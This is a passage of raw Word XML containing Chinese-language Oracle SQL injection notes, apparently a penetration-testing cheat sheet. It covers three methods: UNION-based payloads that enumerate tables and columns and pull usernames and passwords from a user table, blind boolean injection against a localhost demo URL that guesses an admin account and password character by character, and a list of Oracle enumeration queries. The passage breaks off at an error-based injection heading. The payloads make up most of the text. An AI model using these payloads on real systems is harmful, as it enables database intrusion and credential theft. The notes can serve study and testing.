          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BD7F92A" wp14:editId="277EAF87">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>589915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2242185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="571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D69BE" w14:textId="781B407F" w:rsidR="00F01180" w:rsidRDefault="001011AF" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="001011AF">
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidR="00F01180">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48863130" w14:textId="061F47B4" w:rsidR="00DF58C3" w:rsidRDefault="00DF58C3" w:rsidP="00DF58C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--注释符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E79BD" w14:textId="77777777" w:rsidR="00173CA1" w:rsidRDefault="00173CA1" w:rsidP="00DF58C3"/>
    <w:p w14:paraId="1A31E786" w14:textId="1602F32E" w:rsidR="00173CA1" w:rsidRDefault="00173CA1" w:rsidP="00173CA1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有显示的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E2C30" w14:textId="3B612E16" w:rsidR="006A3B28" w:rsidRPr="001011AF" w:rsidRDefault="006A3B28" w:rsidP="00173CA1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法一：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B5B4FD" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRPr="00F94D6E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94D6E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>order by 3--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED116B" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRPr="00F94D6E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94D6E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and 1=2 union select null,null,null from dual--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C228F7" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRPr="00F94D6E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94D6E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and 1=2 union select 'null',null,null from dual--  //返回正常，则第一个字段是数字型，返回错误，为字符型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA3F35" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRPr="00F94D6E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94D6E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and 1=2 union select 1,'2','3' from dual--  //判断显示位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6947A5EC" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRPr="00F94D6E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94D6E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and 1=2 union select null,(select banner from sys.v_$version where rownum=1),null from dual--  //探测数据库版本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB54E7C" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRPr="00F94D6E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94D6E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual--  //查询第一个表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5290DFA2" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRPr="00F94D6E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94D6E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name&lt;&gt;'STUDENT'),null from dual--  //第二个表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7025AE58" w14:textId="77777777" w:rsidR="00F94D6E" w:rsidRPr="00F94D6E" w:rsidRDefault="00F94D6E" w:rsidP="003C3D8B">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94D6E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>获取关键表中的列名：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94D6E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>' union select null,(select column_name from user_tab_columns where table_name='T_USER' and rownum=1),null from dual –</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94D6E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A024DF" w14:textId="1ECFA9A2" w:rsidR="00F94D6E" w:rsidRPr="00F94D6E" w:rsidRDefault="00F94D6E" w:rsidP="003C3D8B">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94D6E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>' union select null,(select column_name from user_tab_columns where table_name='T_USER'  and column_name&lt;&gt;'SUSER' and rownum=1),null from dual –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11267522" w14:textId="3BD6ACFF" w:rsidR="00F94D6E" w:rsidRPr="00F94D6E" w:rsidRDefault="00F94D6E" w:rsidP="003C3D8B">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94D6E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>' union select null,(select column_name from user_tab_columns where table_name='T_USER'  and column_name&lt;&gt;'SUSER' and column_name&lt;&gt;'SPWD' and rownum=1),null from dual –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67180A52" w14:textId="1FAB7EA6" w:rsidR="00F94D6E" w:rsidRPr="00F94D6E" w:rsidRDefault="00F94D6E" w:rsidP="003C3D8B">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94D6E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>' union select null,(select column_name from user_tab_columns where table_name='T_USER'  and column_name&lt;&gt;'SUSER' and column_name&lt;&gt;'SPWD'  and column_name&lt;&gt;'SNAME' and rownum=1),null from dual –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8B7C1" w14:textId="14E317E3" w:rsidR="009B36FD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>and 1=2 union select id,name,pass from student where id=1--  //查看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE3CC3" w14:textId="2FF4200C" w:rsid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>数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E2648" w14:textId="636A51E1" w:rsidR="00F94D6E" w:rsidRDefault="00F94D6E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' union select SNAME,SUSER,SPWD from T_USER --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F93B483" w14:textId="075B76EC" w:rsidR="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="00173CA1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法二：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5736BD67" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>演示URL：</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3B28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http://127.0.0.1/news.jsp?id=66 </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3B28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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0CFEB1" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.首先按照惯例，我们先进行是否存在注入点的 简单判断。在 id=66 后面添加：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93CA2F" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and 1=1? （返回正常）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0268C" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and 1=2? （返回错误）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D93888C" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. 判断一下数据库中的表，网址后加上：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA4BD5" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and (select count(*) from admin) &lt;&gt;0??? （返回正常则说明存在该表）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C16A6" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这里如果返回错误，我们可以多尝试其他表明，例如：manager ，username等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FADCA33" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3. 判断下该网站管理员账户有几个：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5932F5F2" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and (select count(*) from admin)=1? （返回正常说明只有一个管理员）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13122294" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.已知表的前提下，判断表中字段结构：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C53D31" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and (select count(name) from admin)&gt;=0?</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>? </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>（返回正常，说明存在name字段）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC947D5" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5. 判断表中的密码存放列名：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD597B5" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and (select count(pass) from admin)&gt;=0?? （返回正常，说明存在pass字段）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29F916" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6. 接下来采用ASCII码折半法猜解管理员帐号和密码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28457E0F" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and (select count(*) from admin where length(name)&gt;=5)=1? （返回正常，说明为 5 个字符长度）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01E0B7" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7. 再猜测第一个字符的ASCII码的值：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C16891A" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and (select count(*) from admin where ascii(substr(name,1,1))&gt;=97? （返回正常，则说明第一个字符的ASCII码为 97 （a））</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27965BE6" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依次类推，再猜第二个字符对应的值：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E505BE6" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and (select count(*) from admin where ascii(substr(name,2,1))&gt;=100)=1? （返回正常，则说明第二个字符的ASCII码为 100（d））</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE25C1F" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8. 在得到管理员的账户名后，接着我们用同样的方法来获取 pass ：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F4FBBC" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and (select count(*) from admin where length(pass)&gt;=8)=1? （返回正常，则密码长度为 8 位，同样说明为明文密码串！）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126A397C" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9. 猜测pass列第一个字符的ASCII码的值：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102C09E4" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and (select count(*) from admin where ascii(substr(pass,1,1))&gt;=97)=1? （返回正常，则第一个字符为 97 （a） ）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04841A04" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依次类推，再猜第二个字符对应的值：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6C90B" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28">
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>and (select count(*) from admin where ascii(substr(pwd,2,1))&gt;=100)=1?</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>? </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>（返回正常，则说明第二个字符的ASCII码为 100（d））</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEDE2EC" w14:textId="77777777" w:rsidR="006A3B28" w:rsidRPr="006A3B28" w:rsidRDefault="006A3B28" w:rsidP="006A3B28"/>
    <w:p w14:paraId="2DCDA98E" w14:textId="49C4250D" w:rsidR="009B36FD" w:rsidRDefault="004A6F47" w:rsidP="00173CA1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法三</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795A0603" w14:textId="77777777" w:rsidR="004A6F47" w:rsidRDefault="004A6F47" w:rsidP="004A6F47">
      <w:r>
        <w:t>Union联合查询：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　order by 定字段</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　and 1=2 union select null,null..... from dual 然后一个一个去判断字段类型，方法如下</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　and 1=2 union select 'null',null...... from dual 返回正常，说明第一个字段是字符型，反之为数字型</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　　　第一个字段是字符型，判断第二个字段类型：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　　　and 1=2 union select 'null','null'...... from dual 返回正常，说明第二个字段是字符型，反之为数字型</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　　　第一个字段是数字型，判断第二个字段类型：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　　　and 1=2 union select null,'null'...... from dual 返回正常，说明第二个字段是字符型，反之为数字型</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　判断第n个字段的类型，依次类推即可</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　确定回显位，假设当前共2个字段，全是数字型，判断方式如下：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　and 1=2 union select 1,2 from dual</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　假设回显位是2，爆当前数据库中的第一个表：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　and 1=2 union select 1,(select table_name from user_tables where rownum=1) from dual </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　爆当前数据库中的第二个表：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　and 1=2 union select 1,(select table_name from user_tables where rownum=1 and table_name not in ('第一个表')) from dual</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　以此类推去爆第n个表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　爆某表中的第一个字段：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　and 1=2 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name='表名（大写的）') from dual</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　爆某表中的第二个字段：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　and 1=2 union select 1,(select column_name from user_tab_columns where rownum=1 </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>and table_name='表名' and column_name not in ('第一个字段')) from dual</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　爆其它字段以此类推</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　爆某表中的第一行数据：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　and 1=2 union select 1,字段1||字段2...||字段n from 表名 where rownum=1 --连接多个字段用到的连接符号是||,在oracle数据库中，concat函数只能连接两个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA5AB43" w14:textId="77777777" w:rsidR="004A6F47" w:rsidRDefault="004A6F47" w:rsidP="004A6F47">
      <w:r>
        <w:t xml:space="preserve">　　通过字段名找到对应表：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A7DAB8" w14:textId="77777777" w:rsidR="004A6F47" w:rsidRDefault="004A6F47" w:rsidP="004A6F47">
      <w:r>
        <w:t xml:space="preserve">　　查询第N行：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — 查询第9行(从1开始数)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7E9337" w14:textId="77777777" w:rsidR="004A6F47" w:rsidRDefault="004A6F47" w:rsidP="004A6F47">
      <w:r>
        <w:t xml:space="preserve">　　当前用户：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　SELECT user FROM dual;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE2A509" w14:textId="77777777" w:rsidR="004A6F47" w:rsidRDefault="004A6F47" w:rsidP="004A6F47">
      <w:r>
        <w:t xml:space="preserve">　　列出所有用户：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　SELECT username FROM all_users ORDER BY username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E20E15" w14:textId="77777777" w:rsidR="004A6F47" w:rsidRDefault="004A6F47" w:rsidP="004A6F47">
      <w:r>
        <w:t xml:space="preserve">　　列出数据库</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　SELECT DISTINCT owner FROM all_tables; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B42FDDD" w14:textId="77777777" w:rsidR="004A6F47" w:rsidRDefault="004A6F47" w:rsidP="004A6F47">
      <w:r>
        <w:t xml:space="preserve">　　列出表名：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　SELECT table_name FROM all_tables;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　SELECT owner, table_name FROM all_tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0411F702" w14:textId="77777777" w:rsidR="004A6F47" w:rsidRDefault="004A6F47" w:rsidP="004A6F47">
      <w:r>
        <w:t xml:space="preserve">　　列出字段名：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403DB49C" w14:textId="77777777" w:rsidR="004A6F47" w:rsidRDefault="004A6F47" w:rsidP="004A6F47">
      <w:r>
        <w:t xml:space="preserve">　　定位DB文件：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">　　SELECT name FROM V$DATAFILE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE40A3" w14:textId="6CFF4196" w:rsidR="004A6F47" w:rsidRDefault="00173CA1" w:rsidP="00173CA1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1784147A" w14:textId="4650810E" w:rsidR="00173CA1" w:rsidRDefault="00173CA1" w:rsidP="00173CA1">
      <w:r>
